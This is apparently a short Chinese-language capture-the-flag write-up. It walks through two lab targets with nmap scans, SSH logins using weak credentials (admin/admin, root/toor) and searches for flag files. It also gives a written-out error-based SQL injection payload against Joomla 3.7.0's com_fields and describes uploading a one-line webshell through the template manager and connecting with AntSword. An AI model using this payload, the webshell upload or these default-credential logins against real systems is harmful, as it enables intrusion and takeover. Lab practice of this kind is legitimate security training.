任务8
先通过nmap -sV -T4 IP地址扫描下端口

1. Flag:OpenSSH 5.3 (protocol 2.0)
访问下目标80端口的网页 ,猜拳胜利后得到了密码

进行base64 echo MTE0NTE0Cg== | base64 -d
![]()

这里使用putty直接连SSH,然后将这个图片文件放到html下面,设置权限为chmod 777
1. Open
2. Flag{OpenSSHbug}
Find / -name “flag1.txt”
Find / -name “flag2.txt”
![]()
![]()
6 先nmap -sV -T4 IP地址,扫描对应的端口信息。

通过joomsacn –url http://192.168.3.52 得到了CMS版本号

还有些目录 得到了后台登陆页面

账户密码是弱口令 admin admin

Searchsploit Joomla 3.7.0 //搜索对应的poc

/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=extractvalue(666,concat(0x3a,version(),0x3a)) //报错盲注的知识

进入后台的模版管理这里,上传一句话木马文件,然后通过蚁剑连接就行

发现SSH服务是弱口令 root toor 直接连进去
